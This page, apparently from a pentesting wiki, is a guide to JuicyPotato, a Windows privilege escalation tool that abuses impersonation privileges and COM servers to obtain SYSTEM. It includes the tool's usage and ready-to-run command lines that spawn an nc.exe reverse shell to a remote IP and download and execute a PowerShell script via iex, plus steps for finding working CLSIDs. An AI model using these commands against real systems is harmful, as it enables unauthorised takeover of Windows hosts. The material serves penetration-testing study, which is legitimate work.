Skip to content

JuicyPotato โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

WhiteIntel โ€‹

WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.

Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for free at:

โ›“๏ธ External Link

โš ๏ธ

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer, RoguePotato, SharpEfsPotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. Check:

Juicy Potato (abusing the golden privileges) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a> โ€‹

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM

You can download juicypotato from https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts โ€‹

Summary <a href="#summary" id="summary"></a> โ€‹

From juicy-potato Readme:

RottenPotatoNG and its variants leverages the privilege escalation chain based on BITS service having the MiTM listener on 127.0.0.1:6666 and when you have SeImpersonate or SeAssignPrimaryToken privileges. During a Windows build review we found a setup where BITS was intentionally disabled and port 6666 was taken.

We decided to weaponize RottenPotatoNG: Say hello to Juicy Potato.

For the theory, see Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM and follow the chain of links and references.

We discovered that, other than BITS there are a several COM servers we can abuse. They just need to:

  1. be instantiable by the current user, normally a โ€œservice userโ€ which has impersonation privileges
  2. implement the IMarshal interface
  3. run as an elevated user (SYSTEM, Administrator, โ€ฆ)

After some testing we obtained and tested an extensive list of interesting CLSIDโ€™s on several Windows versions.

Juicy details <a href="#juicy-details" id="juicy-details"></a> โ€‹

JuicyPotato allows you to:

  • Target CLSID pick any CLSID you want. Here you can find the list organized by OS.
  • COM Listening port define COM listening port you prefer (instead of the marshalled hardcoded 6666)
  • COM Listening IP address bind the server on any IP
  • Process creation mode depending on the impersonated userโ€™s privileges you can choose from:
    • CreateProcessWithToken (needs SeImpersonate)
    • CreateProcessAsUser (needs SeAssignPrimaryToken)
    • both
  • Process to launch launch an executable or script if the exploitation succeeds
  • Process Argument customize the launched process arguments
  • RPC Server address for a stealthy approach you can authenticate to an external RPC server
  • RPC Server port useful if you want to authenticate to an external server and firewall is blocking port 135โ€ฆ
  • TEST mode mainly for testing purposes, i.e. testing CLSIDs. It creates the DCOM and prints the user of token. See here for testing

Usage <a href="#usage" id="usage"></a> โ€‹

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Final thoughts <a href="#final-thoughts" id="final-thoughts"></a> โ€‹

From juicy-potato Readme:

If the user has SeImpersonate or SeAssignPrimaryToken privileges then you are SYSTEM.

Itโ€™s nearly impossible to prevent the abuse of all these COM Servers. You could think about modifying the permissions of these objects via DCOMCNFG but good luck, this is gonna be challenging.

The actual solution is to protect sensitive accounts and applications which run under the * SERVICE accounts. Stopping DCOM would certainly inhibit this exploit but could have a serious impact on the underlying OS.

From: http://ohpe.it/juicy-potato/

Examples โ€‹

Note: Visit this page for a list of CLSIDs to try.

Get a nc.exe reverse shell โ€‹

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell rev โ€‹

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Launch a new CMD (if you have RDP access) โ€‹

CLSID Problems โ€‹

Oftentimes, the default CLSID that JuicyPotato uses doesn't work and the exploit fails. Usually, it takes multiple attempts to find a working CLSID. To get a list of CLSIDs to try for a specific operating system, you should visit this page:

โ›“๏ธ External Link

Checking CLSIDs โ€‹

First, you will need some executables apart from juicypotato.exe.

Download Join-Object.ps1 and load it into your PS session, and download and execute GetCLSID.ps1. That script will create a list of possible CLSIDs to test.

Then download test_clsid.bat (change the path to the CLSID list and to the juicypotato executable) and execute it. It will start trying every CLSID, and when the port number changes, it will mean that the CLSID worked.

Check the working CLSIDs using the parameter -c

References โ€‹

WhiteIntel โ€‹

WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.

Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for free at:

โ›“๏ธ External Link
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!